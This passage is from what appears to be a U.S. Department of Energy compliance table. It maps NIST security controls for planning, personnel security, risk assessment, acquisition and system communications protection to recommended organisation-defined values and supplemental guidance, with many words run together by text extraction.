The organization plans andcoordinates security-relatedactivities affecting theinformation system with[Assignment: organization-defined individuals orgroups] before conductingsuch activities in order toreduce the impact on otherorganizational entities.
PL-4 0 a Rules of Behavior
The organization:Establishes and makesreadily available toindividuals requiring accessto the information system,the rules that describe theirresponsibilities andexpected behavior withregard to information andinformation system usage;
PL-4 0 b Rules of Behavior
The organization: Receivesa signed acknowledgmentfrom such individuals,indicating that they haveread, understand, and agreeto abide by the rules ofbehavior, before authorizingaccess to information andthe information system;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
113 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PL-4 0 c Rules of Behavior
The organization: Reviewsand updates the rules ofbehavior [Assignment:organization-definedfrequency]; and
PL-4 0 d Rules of Behavior
The organization: Requiresindividuals who have signeda previous version of therules of behavior to read andresign when the rules ofbehavior arerevised/updated.
PL-4 1 Rules of Behavior
The organization includes inthe rules of behavior,explicit restrictions on theuse of socialmedia/networking sites andposting organizationalinformation on publicwebsites.
PL-8 0 a 1Information Security
Architecture
The organization: Developsan information securityarchitecture for theinformation system that:Describes the overallphilosophy, requirements,and approach to be takenwith regard to protecting theconfidentiality, integrity,and availability oforganizational information;
PL-8 0 a 2Information Security
Architecture
The organization: Developsan information securityarchitecture for theinformation system thatDescribes how theinformation securityarchitecture is integratedinto and supports theenterprise architecture; and
PL-8 0 a 3Information Security
Architecture
The organization: Developsan information securityarchitecture for theinformation system thatDescribes any informationsecurity assumptions about,and dependencies on,external services;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
114 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PL-8 0 bInformation Security
Architecture
The organization: Reviewsand updates the informationsecurity architecture[Assignment: organization-defined frequency] to reflectupdates in the enterprisearchitecture; and
PL-8 0 cInformation Security
Architecture
The organization: Ensuresthat planned informationsecurity architecturechanges are reflected in thesecurity plan, the securityConcept of Operations(CONOPS), andorganizationalprocurements/acquisitions.
PS-1 a 1Personnel Security
Policy and Procedures
The organization: a.Develops, documents, anddisseminates to[Assignment: organization-defined personnel or roles]:A personnel security policythat addresses purpose,scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance;and
Security Staff andAdministrative Staff
PS-1 a 2Personnel Security
Policy and Procedures
The organization: a.Develops, documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of thepersonnel security policyandassociated personnelsecurity controls; and
Security Staff andAdministrative Staff
PS-1 b 1Personnel Security
Policy and Procedures
The organization: Reviewsand updates the current:Personnel security policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
115 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PS-1 b 2Personnel Security
Policy and Procedures
The organization: Reviewsand updates the current:Personnel securityprocedures [Assignment:organization-definedfrequency].
Annually or any timethere is a major change
PS-2 a -Position
Categorization
The organization: Assigns arisk designation to allpositions;
PS-2 b -Position
Categorization
The organization:Establishes screeningcriteria for individualsfilling those positions; and
PS-2 c -Position
Categorization
The organization: Reviewsand revises position riskdesignations [Assignment:organization-definedfrequency].
Annually or when newpositions are developed
PS-3 a - Personnel Screening
The organization: Screensindividuals prior toauthorizing access to theinformation system; and
PS-3 b - Personnel Screening
The organization:Rescreens individualsaccording to [Assignment:organization-defined list ofconditions requiringrescreening and, where re-screening is so indicated,the frequency of suchrescreening].
The risk categorizationbut no less than every60 months or any timethe manager feels the
individual’s risk factorshave changed in
accordance with HSPD12 and HR
PS-4 a - Personnel Termination
The organization, upontermination of individualemployment: Disablesinformation system access,within [Assignment:organization-defined timeperiod];
PS-4 b - Personnel Termination
The organizationtermination of individualemployment:Terminates/revokes anyauthenticators/credentialsassociated with theindividual;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
116 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PS-4 c - Personnel Termination
The organizationtermination of individualemployment: Conducts exitinterviews that include adiscussion of [Assignment:organization-definedinformation security topics];
PS-4 d - Personnel Termination
The organization, upontermination of individualemployment: Retrieves allsecurity-relatedorganizational informationsystem-related property;
PS-4 e - Personnel Termination
The organization, upontermination of individualemployment: Retainsaccess to organizationalinformation and informationsystems formerly controlledby terminated individual;and
PS-4 f - Personnel Termination
The organization, upontermination of individualemployment: Notifies[Assignment: organization-defined personnel or roles]within [Assignment:organization-defined timeperiod].
PS-5 a - Personnel Transfer
The organization: Reviewsand confirms ongoingoperational need for currentlogical and physical accessauthorizations toinformationsystems/facilities whenindividuals are reassigned ortransferredto other positions within theorganization;
PS-5 b - Personnel Transfer
The organization: Initiates[Assignment: organization-defined transfer orreassignment actions] within[Assignment: organization-defined time periodfollowing the formaltransfer action];
A review to ensure allindividual access is
modified appropriate tothe new position within
30 days of a transferaction
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
117 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PS-5 c - Personnel Transfer
The organization: Modifiesaccess authorization asneeded to correspond withany changes in operationalneed due to reassignment ortransfer; and
PS-5 d - Personnel Transfer
The organization: Notifies[Assignment: organization-defined personnel or roles]within [Assignment:organization-defined timeperiod].
PS-6 a - Access Agreements
The organization developsand documents accessagreements fororganizational informationsystems;
Access agreements include,for example, nondisclosureagreements, acceptable useagreements, rules ofbehavior, and conflict-of-interest agreements.
PS-6 b - Access Agreements
The organizationreviews/updates the accessagreements [Assignment:organization-definedfrequency].
Annually
PS-6 c 1 Access Agreements
The organization ensuresthat individuals requiringaccess to organizationalinformation and informationsystems sign appropriateaccess agreements prior tobeing granted access: and
PS-6 c 2 Access Agreements
The organization ensuresthat individuals requiringaccess to organizationalinformation and informationsystems Re-sign accessagreements to maintainaccess to organizationalinformation systemswhen access agreementshave been updated or[Assignment: organization-defined frequency].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
118 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PS-7 a -Third-Party Personnel
Security
The organization establishespersonnel securityrequirements includingsecurity roles andresponsibilities for third-party providers.
Third-party providersinclude, for example, servicebureaus, contractors, andother organizations providinginformation systemdevelopment, informationtechnology services,outsourced applications, andnetwork and securitymanagement.
PS-7 b -Third-Party Personnel
Security
The organization requiresthird-party providers tocomply with personnelsecurity policies andprocedures established bythe organization.
PS-7 c -Third-Party Personnel
Security
The organization documentspersonnel securityrequirements
PS-7 d -Third-Party Personnel
Security
The organization requiresthird-party providers tonotify [Assignment:organization-definedpersonnel or roles] of anypersonnel transfers orterminations of third-partypersonnel who possessorganizational credentialsand/or badges, or who haveinformation systemprivileges within[Assignment: organization-defined time period]; and
PS-7 e -Third-Party Personnel
SecurityThe organization monitorsprovider compliance.
PS-8 a - Personnel Sanctions
The organization employs aformal sanctions process forpersonnel failing to complywith established informationsecurity policies andprocedures and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
119 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PS-8 b - Personnel Sanctions
The organization notifies[Assignment: organization-defined personnel or roles]within [Assignment:organization-defined timeperiod] when a formalemployee sanctions processis initiated, identifying theindividual sanctioned andthe reason for the sanction.
RA-1
a -Risk Assessment
Policy and Procedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:A risk assessment policythat addresses purpose,scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
RA-1
a -Risk Assessment
Policy and Procedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of the riskassessment policy andassociated risk assessmentcontrols; and
Security Staff andAdministrative Staff
RA-1
b -Risk Assessment
Policy and Procedures
The organization: Reviewsand updates the current:Risk assessment policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
RA-1
b -Risk Assessment
Policy and Procedures
The organization: Reviewsand updates the current:Risk assessment procedures[Assignment: organization-defined frequency].
Annually or any timethere is a major change
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
120 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
RA-2
aSecurity
Categorization
The organization:Categorizes information andthe information system inaccordance with applicablefederal laws, ExecutiveOrders, directives, policies,regulations, standards, andguidance;
RA-2
bSecurity
Categorization
The organization:Documents the securitycategorization results(including supportingrationale) in the securityplan for the informationsystem; and
RA-2
cSecurity
Categorization
The organization: Ensuresthe security categorizationdecision is reviewed andapproved by the authorizingofficial or authorizingofficial designatedrepresentative.
RA-3
a Risk Assessment
The organization: Conductsan assessment of risk,including the likelihood andmagnitude of harm, from theunauthorized access, use,disclosure, disruption,modification, or destructionof the information systemand the information itprocesses, stores, ortransmits;
RA-3
b Risk Assessment
The organization:Documents risk assessmentresults in [Selection:security plan; riskassessment report;[Assignment: organization-defined document]];
A risk assessmentreport or securityassessment report
RA-3
c Risk Assessment
The organization: Reviewsrisk assessment results[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
121 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
RA-3
d Risk Assessment
The organization:Disseminates riskassessment results to[Assignment: organization-defined personnel or roles];and
RA-3
e Risk Assessment
The organization: Updatesthe risk assessment[Assignment: organization-defined frequency] orwhenever there aresignificant changes to theinformation system orenvironment of operation(including the identificationof new threats andvulnerabilities), or otherconditions that may impactthe security state of thesystem.
RA-5
aVulnerability
Scanning
The organization: Scans forvulnerabilities in theinformation system andhosted applications[Assignment: organization-defined frequency and/orrandomly in accordancewith organization-definedprocess] and when newvulnerabilities potentiallyaffecting thesystem/applications areidentified and reported;
Quarterly
RA-5
b 1Vulnerability
Scanning
The organization: Employsvulnerability scanning toolsand techniques that promoteinteroperability among toolsand automate parts of thevulnerability managementprocess by using standardsfor: Enumerating platforms,software flaws, andimproper configurations;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
122 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
RA-5
b 2Vulnerability
Scanning
The organization: Employsvulnerability scanning toolsand techniques that promoteinteroperability among toolsand automate parts of thevulnerability managementprocess by using standardsfor: Formatting and makingtransparent, checklists andtest procedures; and
RA-5
b 3Vulnerability
Scanning
The organization: Employsvulnerability scanning toolsand techniques that promoteinteroperability among toolsand automate parts of thevulnerability managementprocess by using standardsfor: Measuringvulnerability impact;
RA-5
cVulnerability
Scanning
The organization: Analyzesvulnerability scan reportsand results from securitycontrol assessments;
RA-5
dVulnerability
Scanning
The organization:Remediates legitimatevulnerabilities [Assignment:organization-definedresponse times] inaccordance with anorganizational assessment ofrisk; and
Within 60 days for highand 30 days for critical
vulnerabilities
RA-5
eVulnerability
Scanning
The organization: Sharesinformation obtained fromthe vulnerability scanningprocess and security controlassessments with designatedpersonnel throughout theorganization to helpeliminate similarvulnerabilities in otherinformation systems (i.e.,systemic weaknesses ordeficiencies).
RA-5
1Vulnerability
Scanning
The organization employsvulnerability scanning toolsthat include the capability toreadily update the list ofinformation systemvulnerabilities scanned.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
123 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
RA-5
2Vulnerability
Scanning
The organization updatesthe information systemvulnerabilities scanned[Selection (one or more):[Assignment: organization-defined frequency]; prior toa new scan; when newvulnerabilities are identifiedand reported].
RA-5
5Vulnerability
Scanning
The information systemimplements privilegedaccess authorization to[Assignment: organizationidentified informationsystem components] forselected [Assignment:organization-definedvulnerability scanningactivities].
SA-1 0 a 1System Services
Acquisition Policy andProcedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:A system and servicesacquisition policy thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
SA-1 0 a 2System Services
Acquisition Policy andProcedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of thesystem and servicesacquisition policy andassociated system andservices acquisitioncontrols; and
Security Staff andAdministrative Staff
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
124 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SA-1 0 b 1System Services
Acquisition Policy andProcedures
The organization Reviewsand updates the current:System and servicesacquisition policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
SA-1 0 b 2System Services
Acquisition Policy andProcedures
The organization Reviewsand updates the current:System and servicesacquisition procedures[Assignment: organization-defined frequency].
Annually or any timethere is a major change
SA-2 0 aAllocation of
Resources
The organization:Determines informationsecurity requirements for theinformation system orinformation system servicein mission/business processplanning;
SA-2 0 bAllocation of
Resources
The organization:Determines, documents, andallocates the resourcesrequired to protect theinformation system orinformation system serviceas part of its capitalplanning and investmentcontrol process; and
SA-2 0 cAllocation of
Resources
The organization:Establishes a discrete lineitem for informationsecurity in organizationalprogramming and budgetingdocumentation.
SA-3 0 aSystem Development
Life Cycle
The organization: Managesthe information systemusing [Assignment:organization-defined systemdevelopment life cycle] thatincorporates informationsecurity considerations;
SA-3 0 bSystem Development
Life Cycle
The organization: Definesand documents informationsecurity roles andresponsibilities throughoutthe system development lifecycle;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
125 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SA-3 0 cSystem Development
Life Cycle
The organization: Identifiesindividuals havinginformation security rolesand responsibilities; and
SA-3 0 dSystem Development
Life Cycle
The organization: Integratesthe organizationalinformation security riskmanagement process intosystem development lifecycle activities.
SA-4 0 a Acquisition Process
The organization includesthe following requirements,descriptions, and criteria,explicitly or by reference, inthe acquisition contract forthe information system,system component, orinformation system servicein accordance withapplicable federal laws,Executive Orders,directives, policies,regulations, standards,guidelines, andorganizationalmission/business needs:Security functionalrequirements; Securityfunctional requirements,
SA-4 0 b Acquisition ProcessSecurity strengthrequirements,
SA-4 0 c Acquisition ProcessSecurity assurancerequirements,
SA-4 0 d Acquisition ProcessSecurity-relateddocumentationrequirements,
SA-4 0 e Acquisition ProcessRequirements for protectingsecurity-relateddocumentation,
SA-4 0 f Acquisition Process
Description of theinformation systemdevelopment environmentand environment in whichthe system is intended tooperate, and
SA-4 0 g Acquisition ProcessAcceptance criteria
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
126 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SA-4 1 Acquisition Process
The organization requiresthe developer of theinformation system, systemcomponent, or informationsystem service to provide adescription of the functionalproperties of the securitycontrols to be employed.
SA-4 2 Acquisition Process
The organization requiresthe developer of theinformation system, systemcomponent, or informationsystem service to providedesign and implementationinformation for the securitycontrols to be employed thatincludes: [Selection (one ormore): security-relevantexternal system interfaces;high-level design; low-leveldesign; source code orhardware schematics;[Assignment: organization-defineddesign/implementationinformation]] at[Assignment: organization-defined level of detail].
SA-4 9 Acquisition Process
The organization requiresthe developer of theinformation system, systemcomponent, or informationsystem service to identifyearly in the systemdevelopment life cycle, thefunctions, ports, protocols,and services intended fororganizational use.
SA-4 10 Acquisition Process
The organization employsonly information technologyproducts on the FIPS 201-approved products list forPersonal IdentityVerification (PIV)capability implementedwithin organizationalinformation systems.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
127 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SA-5 0 a 1Information System
Documentation
The organization: Obtainsadministrator documentationfor the information system,system component, orinformation system servicethat describes: Secureconfiguration, installation,and operation of the system,component, or service;
SA-5 0 a 2Information System
Documentation
The organization: Obtainsadministrator documentationfor the information system,system component, orinformation system servicethat describes: Effective useand maintenance of securityfunctions/mechanisms; and
SA-5 0 a 3Information System
Documentation
The organization: Obtainsadministrator documentationfor the information system,system component, orinformation system servicethat describes: Knownvulnerabilities regardingconfiguration and use ofadministrative (i.e.,privileged) functions;
SA-5 0 b 1Information System
Documentation
The organization: Obtainsuser documentation for theinformation system, systemcomponent, or informationsystem service thatdescribes: User-accessiblesecurityfunctions/mechanisms andhow to effectively use thosesecurityfunctions/mechanisms
SA-5 0 b 2Information System
Documentation
The organization: Obtainsuser documentation for theinformation system, systemcomponent, or informationsystem service thatdescribes: Methods for userinteraction, which enablesindividuals to use thesystem, component, orservice in a more securemanner; and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
128 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SA-5 0 b 3Information System
Documentation
The organization: Obtainsuser documentation for theinformation system, systemcomponent, or informationsystem service thatdescribes: Userresponsibilities inmaintaining the security ofthe system, component, orservice;
SA-5 0 cInformation System
Documentation
The organization:Documents attempts toobtain information system,system component, orinformation system servicedocumentation when suchdocumentation is eitherunavailable or nonexistentand [Assignment:organization-definedactions] in response;
SA-5 0 dInformation System
Documentation
The organization: Protectsdocumentation as required,in accordance with the riskmanagement strategy; and
SA-5 0 eInformation System
Documentation
The organization:Distributes documentationto [Assignment:organization-definedpersonnel or roles].
SA-8 0Security Engineering
Principles
The organization appliesinformation system securityengineering principles in thespecification, design,development,implementation, andmodification of theinformation system.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
129 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SA-9 0 aExternal Information
System Services
The organization: Requiresthat providers of externalinformation system servicescomply with organizationalinformation securityrequirements and employ[Assignment: organization-defined security controls] inaccordance with applicablefederal laws, ExecutiveOrders, directives, policies,regulations, standards, andguidance;
An external informationsystem service is a servicethat is implemented outsideof the authorization boundaryof the organizationalinformation system. Theresponsibility for adequatelymitigating risks arising fromthe use of externalinformation system servicesremains with the authorizingofficial.
SA-9 0 bExternal Information
System Services
The organization: Definesand documents governmentoversight and user roles andresponsibilities with regardto external informationsystem services; and
SA-9 0 cExternal Information
System Services
The organization: Employs[Assignment: organization-defined processes, methods,and techniques] to monitorsecurity control complianceby external serviceproviders on an ongoingbasis.
SA-9 2External Information
System Services
The organization requiresproviders of [Assignment:organization-definedexternal information systemservices] to identify thefunctions, ports, protocols,and other services requiredfor the use of such services.
SA-10
0 aDeveloper
ConfigurationManagement
The organization requiresthe developer of theinformation system, systemcomponent, or informationsystem service to: Performconfiguration managementduring system, component,or service [Selection (one ormore): design;development;implementation; operation];
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
130 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SA-10
0 bDeveloper
ConfigurationManagement
The organization requiresthe developer of theinformation system, systemcomponent, or informationsystem service to:Document, manage, andcontrol the integrity ofchanges to [Assignment:organization-definedconfiguration items underconfiguration management];
SA-10
0 cDeveloper
ConfigurationManagement
The organization requiresthe developer of theinformation system, systemcomponent, or informationsystem service to:Implement onlyorganization-approvedchanges to the system,component, or service;
SA-10
0 dDeveloper
ConfigurationManagement
The organization requiresthe developer of theinformation system, systemcomponent, or informationsystem service to:Document approvedchanges to the system,component, or service andthe potential securityimpacts of such changes;and
SA-10
0 eDeveloper
ConfigurationManagement
The organization requiresthe developer of theinformation system, systemcomponent, or informationsystem service to: Tracksecurity flaws and flawresolution within thesystem, component, orservice and report findingsto [Assignment:organization-definedpersonnel].
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
131 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SA-11
0 aDeveloper Security
Testing andEvaluation
The organization requiresthe developer of theinformation system, systemcomponent, or informationsystem service to: Createand implement a securityassessment plan;
SA-11
0 bDeveloper Security
Testing andEvaluation
The organization requiresthe developer of theinformation system, systemcomponent, or informationsystem service to: Perform[Selection (one or more):unit; integration; system;regression]testing/evaluation at[Assignment: organization-defined depth andcoverage];
SA-11
0 cDeveloper Security
Testing andEvaluation
The organization requiresthe developer of theinformation system, systemcomponent, or informationsystem service to: Produceevidence of the execution ofthe security assessment planand the results of thesecurity testing/evaluation;
SA-11
0 dDeveloper Security
Testing andEvaluation
The organization requiresthe developer of theinformation system, systemcomponent, or informationsystem service to:Implement a verifiable flawremediation process; and
SA-11
0 eDeveloper Security
Testing andEvaluation
The organization requiresthe developer of theinformation system, systemcomponent, or informationsystem service to: Correctflaws identified duringsecurity testing/evaluation.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
132 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SC-1 a 1System
CommunicationsPolicy and Procedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:A system andcommunications protectionpolicy that addressespurpose, scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
SC-1 a 2System
CommunicationsPolicy and Procedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of thesystem and communicationsprotectionpolicy and associatedsystem and communicationsprotection controls; and
Security Staff andAdministrative Staff
SC-1 b 1System
CommunicationsPolicy and Procedures
The organization: Reviewsand updates the current:System and communicationsprotection policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
SC-1 b 2System
CommunicationsPolicy and Procedures
The organization: Reviewsand updates the current:System and communicationsprotection procedures[Assignment: organization-defined frequency].
Annually or any timethere is a major change
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
133 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SC-2ApplicationPartitioning
The information systemseparates user functionality(including user interfaceservices) from informationsystem managementfunctionality.
The separation of userfunctionality frominformation systemmanagement functionality iseither physical or logical andis accomplished by usingdifferent computers, differentcentral processing units,different instances of theoperating system, differentnetwork addresses,combinations of thesemethods, or other methods asappropriate.
SC-4Information in Shared
Resources
The information systemprevents unauthorized andunintended informationtransfer via shared systemresources.
The purpose of this control isto prevent information,including encryptedrepresentations ofinformation, produced by theactions of a prior user/role (orthe actions of a processacting on behalf of a prioruser/role) from beingavailable to any currentuser/role (or current process)that obtains access to ashared system resource (e.g.,registers, main memory,secondary storage) after thatresource has been releasedback to the informationsystem.
SC-5Denial of Service
Protection
The information systemprotects against or limits theeffects of the followingtypes of denial of serviceattacks: [Assignment:organization-defined typesof denial of service attacksor reference to source forsuch information] byemploying [Assignment:organization-definedsecurity safeguards].
ICMP flood, Teardropattack, Peer-to-peerattacks, Permanentdenial-of- service
attacks, Applicationlevel floods, Nuke,Distributed attack,
Reflected attack, andUnintentional attack
A variety of technologiesexist to limit, or in somecases, eliminate the effects ofdenial of service attacks. Forexample, boundary protectiondevices can filter certaintypes of packets to protectdevices on an organization’sinternal network from beingdirectly affected by denial ofservice attacks.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
134 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SC-7 a Boundary Protection
The information system:Monitors and controlscommunications at theexternal boundary of thesystem and at key internalboundaries within thesystem; and
Restricting external webtraffic only to organizationalweb servers within managedinterfaces and prohibitingexternal traffic that appears tobe spoofing an internaladdress as the source areexamples of restricting andprohibiting communications.Managed interfacesemploying boundaryprotection devices include,for example, proxies,gateways, routers, firewalls,guards, or encrypted tunnelsarranged in an effectivesecurity architecture (e.g.,routers protecting firewallsand application gatewaysresiding on a protectedsubnetwork commonlyreferred to as a demilitarizedzone or DMZ). The EMenterprise full packet capturesatisfies part of thisrequirement.
SC-7 b Boundary Protection
The information system:Implements sub networksfor publicly accessiblesystem components that are[Selection: physically;logically] separated frominternal organizationalnetworks; and
SC-7 c Boundary Protection
The information system:Connects to externalnetworks or informationsystems only throughmanaged interfacesconsisting of boundaryprotection devices arrangedin accordance with anorganizational securityarchitecture.
SC-7 3 Boundary Protection
The organization limits thenumber of external networkconnections to theinformation system
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
135 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SC-7 4 a Boundary Protection
The organization:Implements a managedinterface for each externaltelecommunication service;
SC-7 4 b Boundary Protection
The organization:Establishes a traffic flowpolicy for each managedinterface;
SC-7 4 c Boundary Protection
The organization: Protectsthe confidentiality andintegrity of the informationbeing transmitted acrosseach interface;
SC-7 4 d Boundary Protection
The organization:Documents each exceptionto the traffic flow policywith a supportingmission/business need andduration of that need;
SC-7 4 e Boundary Protection
The organization: Reviewsexceptions to the trafficflow policy [Assignment:organization-definedfrequency] and removesexceptions that are nolonger supported by anexplicit mission/businessneed.
Annually
SC-7 5 Boundary Protection
The information system atmanaged interfaces, deniesnetwork traffic by defaultand allows network trafficby exception (i.e., deny all,permit by exception).
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
136 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SC-7 7 Boundary Protection
The information system, inconjunction with a remotedevice, prevents the devicefrom simultaneouslyestablishing non-remoteconnections with the systemand communicating viasome other connection toresources in externalnetworks.
This control enhancement isimplemented within theremote device (e.g.,notebook/laptop computer)via configuration settings thatare not configurable by theuser of that device. Anexample of a non-remotecommunications path from aremote device is a virtualprivate network. When a non-remote connection isestablished using a virtualprivate network, theconfiguration settings preventsplit-tunneling.
SC-8Transmission Integrity
and Confidentiality
The information systemprotects the [Selection (oneor more): confidentiality;integrity] of transmittedinformation.
This control applies tocommunications acrossinternal and externalnetworks.
SC-8 1Transmission Integrity
and Confidentiality
The information systemimplements cryptographicmechanisms to [Selection(one or more): preventunauthorized disclosure ofinformation; detect changesto information] duringtransmission unlessotherwise protected by[Assignment: organization-defined alternative physicalsafeguards].
SC-10
Network Disconnect
The information systemterminates the networkconnection associated with acommunications session atthe end of the session orafter [Assignment:organization-defined timeperiod] of inactivity.
30 minutes of inactivity
This control applies to bothinternal and externalnetworks. Terminatingnetwork connectionsassociated withcommunications sessionsinclude, for example, de-allocating associated TCP/IPaddress/port pairs at theoperating-system level, or de-allocating networkingassignments at theapplication level if multipleapplication sessions are usinga single, operating system-level network connection.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
137 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SC-12
Cryptographic KeyEstablishment and
Management
The organization establishesand manages cryptographickeys for requiredcryptography employedwithin the informationsystem in accordance with[Assignment: organization-defined requirements forkey generation, distribution,storage, access, anddestruction].
SC-13
Use of Cryptography
The information systemimplements [Assignment:organization-definedcryptographic uses and typeof cryptography required foreach use] in accordancewith applicable federal laws,Executive Orders,directives, policies,regulations, and standards.
SC-15
aCollaborative
Computing Devices
The information system:Prohibits remote activationof collaborative computingdevices with the followingexceptions: [Assignment:organization-definedexceptions where remoteactivation is to be allowed];and
None
Collaborative computingdevices include, for example,networked VTCs, whiteboards, cameras, andmicrophones. Explicitindication of use includes, forexample, signals to userswhen collaborativecomputing devices areactivated.
SC-15
bCollaborative
Computing Devices
The information system:Provides an explicitindication of use to usersphysically present at thedevices.
SC-17
Public KeyInfrastructureCertificates
The organization issuespublic key certificates underan [Assignment:organization definedcertificate policy] or obtainspublic key certificates froman approved serviceprovider.
SC-18
a Mobile Code
The organization: Definesacceptable and unacceptablemobile code and mobilecode technologies;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
138 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
SC-18
b Mobile Code
The organization:Establishes usagerestrictions andimplementation guidancefor acceptable mobile codeand mobile codetechnologies; and
SC-18
c Mobile Code
The organization:Authorizes, monitors, andcontrols the use of mobilecode within the informationsystem.
SC-19
aVoice Over Internet
Protocol
The organization:Establishes usagerestrictions andimplementation guidancefor Voice over InternetProtocol (VoIP)technologies based on thepotential to cause damage tothe information system ifused maliciously; and
SC-19
bVoice Over Internet
Protocol
The organization:Authorizes, monitors, andcontrols the use of VoIPwithin the informationsystem.
SC-20
aSecure Name/Address
Resolution Service(Authoritative Source)
The information system:Provides additional dataorigin and integrity artifactsalong with the authoritativename resolution data thesystem returns in responseto external name/addressresolution queries; and
This control enables remoteclients to obtain originauthentication and integrityverification assurances forthe host/service name tonetwork address resolutioninformation obtained throughthe service. A domain namesystem (DNS) server is anexample of an informationsystem that providesname/address resolutionservice. Digital signaturesand cryptographic keys areexamples of additionalartifacts.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
139 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
